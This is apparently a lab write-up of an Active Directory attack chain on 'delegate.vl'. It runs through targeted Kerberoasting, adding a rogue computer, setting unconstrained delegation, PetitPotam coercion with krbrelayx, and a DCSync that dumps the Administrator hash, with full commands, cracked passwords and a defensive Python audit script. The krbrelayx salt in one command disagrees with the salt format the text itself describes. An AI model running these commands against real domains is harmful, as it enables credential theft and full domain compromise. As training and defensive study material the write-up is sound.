Targeted Kerberoasting & Unconstrained Delegation

In this scenario we chain a dangerous ACL right over another user with the rare SeEnableDelegationPrivilege to make the Domain Controller hand us its "passport": the TGT of the DC1$ machine account.

1. Targeted Kerberoasting (Initial Access)

After running BloodHound as the user A.Briggs, we see that he holds the GenericWrite right over the user N.Thompson. This lets us turn N.Thompson into a Kerberoasting "victim" against his will.

* Logic: Only accounts that have an SPN (Service Principal Name) can be Kerberoasted, because the KDC only issues service tickets for SPNs. With GenericWrite over a user we can write an SPN onto him ourselves, request a TGS for that SPN (encrypted with a key derived from the user's password), harvest the hash and crack it offline. In effect we turn an ordinary user into a service account for the duration of the attack; targetedKerberoast.py removes the temporary SPN again once the ticket has been requested.
* Command:

```bash
python targetedKerberoast.py -v -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123'
```

* Result: We receive a TGS hash for N.Thompson, crack it, and obtain his password KALEB_2341 (used in every command below). That gives us the N.Thompson account, which turns out to hold a critical privilege.
2. Enumeration Analysis

We check N.Thompson's rights and find a "gold mine":

```
whoami /priv -> SeEnableDelegationPrivilege
```

* Logic: SeEnableDelegationPrivilege ("Enable computer and user accounts to be trusted for delegation") is assigned through the Domain Controllers policy and is checked by the DC whenever someone writes the delegation bits of userAccountControl (TRUSTED_FOR_DELEGATION, TRUSTED_TO_AUTH_FOR_DELEGATION) or msDS-AllowedToDelegateTo. Combined with write access to some account, it lets us switch delegation on for that account. This is the key to capturing the DC.
3. Preparing the trap

To exploit delegation we need a computer account in the domain that we control. With the default ms-DS-MachineAccountQuota (10) any authenticated user can add one.

```bash
# 1. Create the computer account stalkx$ with a password we choose
impacket-addcomputer -dc-ip 10.129.234.69 -computer-name 'stalkx$' -computer-pass 'P@$$word123!' 'delegate.vl/N.Thompson:KALEB_2341'

# 2. Add a DNS A record so that the DC can resolve our "server" to our attack host (10.10.14.199)
python3 dnstool.py -u 'delegate.vl\N.Thompson' -p KALEB_2341 -r stalkx.delegate.vl -a add -t A -d 10.10.14.199 -dns-ip 10.129.234.69 DC1.delegate.vl
```

The DNS record matters: during coercion the DC will look up stalkx.delegate.vl, and the SPN we register in the next step has to match that name for the DC to use Kerberos against it.
4. Setting up the SPN and getting past the validated write

For Kerberos to work, stalkx$ needs an SPN. The DC's validated write on servicePrincipalName only accepts an SPN whose host part is one of the account's own names (sAMAccountName without the $, dNSHostName, or an entry of msDS-AdditionalDnsHostName). A computer created with addcomputer's default SAMR method has no dNSHostName, so a direct write of cifs/stalkx.delegate.vl is refused. We use a "two-pass" approach: first register the name as an additional DNS host name, then write the SPN, which now passes validation.

```bash
# First, register the name as an additional DNS host name (msDS-AdditionalDnsHostName)
python3 addspn.py -u 'delegate.vl\N.Thompson' -p KALEB_2341 -s 'cifs/stalkx.delegate.vl' -t 'stalkx$' -dc-ip 10.129.234.69 DC1.delegate.vl --additional
# Now assign the SPN itself to our server
python3 addspn.py -u 'delegate.vl\N.Thompson' -p KALEB_2341 -s 'cifs/stalkx.delegate.vl' -t 'stalkx$' -dc-ip 10.129.234.69 DC1.delegate.vl
```

* Logic: The KDC will now issue service tickets for cifs/stalkx.delegate.vl encrypted with the key of stalkx$, i.e. it treats our machine as a legitimate file server.
5. Unconstrained Delegation

Now we use our main privilege to switch on "ticket stealing" mode on the stalkx$ computer:

```bash
bloodyAD --host 10.129.234.69 -u N.Thompson -p KALEB_2341 -d delegate.vl add uac 'stalkx$' -f TRUSTED_FOR_DELEGATION
```

* Technique: TRUSTED_FOR_DELEGATION (bit 0x80000 of userAccountControl) marks the account for unconstrained delegation. When a client authenticates with Kerberos to a service running under such an account, the client obtains a forwarded TGT from the KDC and embeds it in the AP-REQ, so the service ends up holding a full copy of the client's TGT. Accounts marked "sensitive and cannot be delegated" or placed in Protected Users are exempt; DC1$ is neither by default. Writing this bit is exactly what SeEnableDelegationPrivilege gates, which is why merely owning a computer account is not enough.
6. Coercion: PetitPotam & krbrelayx

Time to lure the Domain Controller into our trap.

* Start the listener. krbrelayx waits for the DC's ticket and needs the stalkx$ key (derived from the password and salt) to decrypt the service ticket:

```bash
sudo python3 krbrelayx.py --krbsalt 'DELEGATE.VLstalkx' --krbpass 'P@$$word123!' -dc-ip 10.129.234.69
```

* Provoke the DC (PetitPotam):

```bash
# Coerce DC1 into authenticating to our stalkx.delegate.vl over SMB (listener first, target second)
python3 PetitPotam.py -u 'stalkx$' -p 'P@$$word123!' -d delegate.vl -dc-ip 10.129.234.69 stalkx.delegate.vl 10.129.234.69
```

* Result: DC1$ connects to cifs/stalkx.delegate.vl; because stalkx$ is trusted for delegation, its AP-REQ carries a forwarded TGT. krbrelayx decrypts the service ticket with the stalkx$ key, extracts the TGT and saves it as dc1.ccache.
* Caveat: krbrelayx derives the AES keys from --krbpass and --krbsalt. The default salt of a computer account has the form REALMhost<hostname>.<realm> (uppercase realm, lowercase host, here DELEGATE.VLhoststalkx.delegate.vl); if the DC encrypts the ticket with AES and the salt does not match, decryption fails, whereas an RC4 ticket only needs the NT hash and ignores the salt.
7. DCSync and Full Domain Pwn

With the TGT of the domain controller account DC1$ we hold an identity that has the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights, i.e. we can replicate the entire AD database.

```bash
export KRB5CCNAME=dc1.ccache
# DCSync with the stolen ticket (-k uses the ccache; the target must be the DC's hostname so that the service ticket's SPN matches)
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.69 -just-dc-user Administrator 'delegate.vl/DC1$@DC1.delegate.vl'
```

* Result: We obtain the Administrator's NT hash: c32198ceab4cc695e65045562aa3ee93.
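As an added example (not code from the original writeup or any of the tools it uses), the following Python models the two checks the DC performs in steps 4 and 5 and the conditions a defender should hunt for after this chain: the simplified validated-write rule for servicePrincipalName, the userAccountControl bit that bloodyAD sets, the default machine-account salt krbrelayx needs, and an audit over a constructed in-memory "directory". The account names are reused from the writeup; every attribute value in DIRECTORY, the helper names and the fake/svc SPN are assumptions made for illustration.

```python
"""Audit of the directory conditions this chain relies on (added example, not
part of the original writeup). The records in DIRECTORY are constructed."""

# userAccountControl bits (MS-ADTS 2.2.16)
TRUSTED_FOR_DELEGATION = 0x80000      # unconstrained delegation
SERVER_TRUST_ACCOUNT = 0x2000         # domain controller computer account
WORKSTATION_TRUST_ACCOUNT = 0x1000    # ordinary member computer
NOT_DELEGATED = 0x100000              # "sensitive and cannot be delegated"


def uac_with_flag(uac: int, flag: int) -> int:
    """The write 'bloodyAD add uac ... -f TRUSTED_FOR_DELEGATION' performs: OR the bit in."""
    return uac | flag


def spn_host_allowed(spn: str, obj: dict) -> bool:
    """Simplified validated write on servicePrincipalName (MS-ADTS 3.1.1.5.3.1.1):
    the host part of 'class/host[:port][/name]' must be the object's NetBIOS name
    (sAMAccountName without '$'), its dNSHostName, or a msDS-AdditionalDnsHostName."""
    if "/" not in spn:
        return False
    host = spn.split("/", 1)[1].split("/", 1)[0].split(":", 1)[0].lower()
    allowed = {obj["sAMAccountName"].rstrip("$").lower()}
    if obj.get("dNSHostName"):
        allowed.add(obj["dNSHostName"].lower())
    allowed.update(h.lower() for h in obj.get("msDS-AdditionalDnsHostName", []))
    return host in allowed


def machine_account_salt(realm: str, sam: str) -> str:
    """Default Kerberos salt for a computer account (MS-KILE 3.1.1.2):
    REALM (upper) + 'host' + hostname (lower) + '.' + realm (lower)."""
    return f"{realm.upper()}host{sam.rstrip('$').lower()}.{realm.lower()}"


def audit(directory: list) -> dict:
    """Flag what this chain needs: user objects carrying an SPN (Kerberoastable)
    and non-DC accounts trusted for unconstrained delegation."""
    findings = {"kerberoastable_users": [], "unconstrained_non_dc": []}
    for obj in directory:
        sam = obj["sAMAccountName"]
        uac = obj.get("userAccountControl", 0)
        if not sam.endswith("$") and obj.get("servicePrincipalName"):
            findings["kerberoastable_users"].append(sam)
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            findings["unconstrained_non_dc"].append(sam)
    return findings


# Constructed directory: the DC, a normal user, a user with an attacker-written SPN,
# and the attacker's computer as it looks after steps 3 to 5.
DIRECTORY = [
    {"sAMAccountName": "DC1$", "dNSHostName": "dc1.delegate.vl",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "A.Briggs", "userAccountControl": 0x200},
    {"sAMAccountName": "N.Thompson", "userAccountControl": 0x200,
     "servicePrincipalName": ["fake/svc"]},          # hypothetical SPN written via GenericWrite
    {"sAMAccountName": "stalkx$",
     "userAccountControl": uac_with_flag(WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION),
     "msDS-AdditionalDnsHostName": ["stalkx.delegate.vl"],
     "servicePrincipalName": ["cifs/stalkx.delegate.vl"]},
]

if __name__ == "__main__":
    fresh = {"sAMAccountName": "stalkx$"}          # right after SAMR addcomputer: no dNSHostName
    print(spn_host_allowed("cifs/stalkx.delegate.vl", fresh))     # False: direct write is refused
    fresh["msDS-AdditionalDnsHostName"] = ["stalkx.delegate.vl"]  # after 'addspn.py --additional'
    print(spn_host_allowed("cifs/stalkx.delegate.vl", fresh))     # True: second pass succeeds
    print(machine_account_salt("delegate.vl", "stalkx$"))
    print(audit(DIRECTORY))
```

The audit deliberately exempts accounts with SERVER_TRUST_ACCOUNT, because every DC is trusted for delegation by design; any other object with the bit set, or any user object with an SPN, is the kind of finding that surfaces this chain.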